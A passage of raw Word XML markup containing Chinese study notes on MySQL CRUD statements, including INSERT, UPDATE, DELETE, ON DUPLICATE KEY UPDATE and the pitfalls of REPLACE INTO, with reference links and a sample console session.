          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>外键中列的数据类型必须和主表主键中对应列的数据类型相同。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73159CF3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F330FE3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="_Toc159779534"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CURD</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:p w14:paraId="04F549D1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://c.biancheng.net/view/2579.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511D7BF1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73289C0C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="_Toc159779535"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>插入数据</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:p w14:paraId="77F76DD8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A3DF07A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>INSERT INTO table_name ( field1, field2,...fieldN )</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>VALUES ( value1, value2,...valueN );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653F5FA5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B45294A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="374DC863" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="_Toc159779536"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更改数据</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p w14:paraId="3E0D42E6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">UPDATE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">tableName </w:t>
      </w:r>
      <w:r>
        <w:t>SET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> columnName</w:t>
      </w:r>
      <w:r>
        <w:t>=4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> where xxxxxxx</w:t>
      </w:r>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCC4F98" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42162C1F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A77A0D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">4     </w:t>
      </w:r>
      <w:r>
        <w:t>2023-01-29 10:05:36.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0227EE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">     2023-01-29 10:09:16.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C29BD2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34E09045" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A9FE5F8" w14:textId="268D8673" w:rsidR="00C43FC3" w:rsidRDefault="00C43FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C43FC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>INSERT ... ON DUPLICATE KEY UPDATE</w:t>
      </w:r>
      <w:r w:rsidRPr="00C43FC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FCA26E" w14:textId="77777777" w:rsidR="00C43FC3" w:rsidRDefault="00C43FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43D8F86D" w14:textId="77777777" w:rsidR="00156A9C" w:rsidRDefault="00156A9C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>INSERT INTO your_table (id, column1, column2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BF41E4" w14:textId="77777777" w:rsidR="00156A9C" w:rsidRDefault="00156A9C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>VALUES (your_id, your_value1, your_value2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454FAEEE" w14:textId="77777777" w:rsidR="00156A9C" w:rsidRDefault="00156A9C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ON DUPLICATE KEY UPDATE column1 = VALUES(column1), column2 = VALUES(column2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF6B7E8" w14:textId="77777777" w:rsidR="00156A9C" w:rsidRDefault="00156A9C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FF9F1C9" w14:textId="77777777" w:rsidR="00156A9C" w:rsidRDefault="00156A9C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上述语句假设</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>your_table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是要操作的表，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是唯一键，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>column1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>column2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是要更新的列。当执行插入操作时，如果存在重复的唯一键，将执行更新操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BD6FD4" w14:textId="77777777" w:rsidR="00156A9C" w:rsidRDefault="00156A9C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C806779" w14:textId="6878009D" w:rsidR="00C43FC3" w:rsidRDefault="00156A9C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意：这种方法可以在不改变自增</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的情况下更新数据，但需要在表上设置适当的唯一键。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D502E9" w14:textId="77777777" w:rsidR="00C43FC3" w:rsidRDefault="00C43FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48F76014" w14:textId="77777777" w:rsidR="00B850D2" w:rsidRDefault="00B850D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="552DB522" w14:textId="77777777" w:rsidR="00B850D2" w:rsidRDefault="00B850D2" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="_Toc159779537"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除数据</w:t>
      </w:r>
      <w:bookmarkEnd w:id="76"/>
    </w:p>
    <w:p w14:paraId="253384C6" w14:textId="77777777" w:rsidR="00C43FC3" w:rsidRDefault="00C43FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C4CC454" w14:textId="5E145371" w:rsidR="00986910" w:rsidRDefault="00F5387D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F5387D">
        <w:lastRenderedPageBreak/>
        <w:t>DELETE FROM users WHERE name = 'John';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1ED5A7" w14:textId="77777777" w:rsidR="00B850D2" w:rsidRDefault="00B850D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="260B7DC3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="_Toc159779538"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>replace into:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无则加，有则改</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
    </w:p>
    <w:p w14:paraId="21E45B63" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5092AB9F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://blog.csdn.net/risingsun001/article/details/38977797</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CED79E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>https://dev.mysql.com/doc/refman/8.0/en/replace.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B328E9C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D95B1B8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>replace into</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的特性（或者说是弊端）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CF986A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5116F9AB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>大意就是在插入新数据，如果主键重复的话，就会删除旧的一行再插入数据。这样affected rows的数量就是2，虽然你认为你只是动了1的数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7974E2D2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>https://blog.csdn.net/weixin_32067105/article/details/113003664?spm=1001.2101.3001.6650.18&amp;utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromBaidu%7ERate-18-113003664-blog-38977797.pc_relevant_default&amp;depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromBaidu%7ERate-18-113003664-blog-38977797.pc_relevant_default&amp;utm_relevant_index=19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142E79FE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>没有预料到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:t>在数据冲突时实际上是删掉了旧记录，再写入新记录，这是使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> REPLACE INTO </w:t>
      </w:r>
      <w:r>
        <w:t>时最大的一个误区，拿之前的例子来说，执行完</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> REPLACE INTO auto (k, v) VALUES (1, ‘1-1’) </w:t>
      </w:r>
      <w:r>
        <w:t>之后，由于新写入记录时并未给</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> extra </w:t>
      </w:r>
      <w:r>
        <w:t>字段指定值，原记录</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> extra </w:t>
      </w:r>
      <w:r>
        <w:t>字段的值就「丢失」了，而通常这并非是业务上所预期的，更常见的需求实际上是，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>当存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> k=1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的记录时，就把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> v </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>字段的值更新为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> ‘1-1’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，其他未指定的字段则保持原状，而满足这一需求的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>方言是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> INSERT INTO auto (k, v) VALUES (1, ‘1-1’) ON DUPLICATE KEY UPDATE v=VALUES(v);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560AC7BC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="769D558E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另一个坑：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE815C3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://blog.csdn.net/zgdwxp/article/details/103337177</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E977FFB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://cloud.tencent.com/developer/article/1669712</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5515851E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大概就是，如果你手动指定主键的值或者不指定的话，他可能是永远新生成的值。涉及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>replace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句特性，和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">AUTO_INCREMENT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的特性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A0ADEF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>binlog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中看到的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>replace into</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并不是删除再插入的语句，而是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>update</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703D8216" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种做法在主从上会发生冲突，不建议线上使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>replace into</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，建议使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>insert</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比较好。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B48526" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">/** 2.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>replace into</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>，唯一键已存在、但主键是新生成的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6264BFB8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>mysql&gt; replace into test_replace values (3, 'a', 'first record replaced');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1BE989" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Query OK, 2 rows affected (0.01 sec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDB08A2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30E6FCDA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>mysql&gt; select * from test_replace;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287F1468" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>+----+------+-----------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3EB220" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>| id | code | title                 |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36442F05" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>+----+------+-----------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CCB1E6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
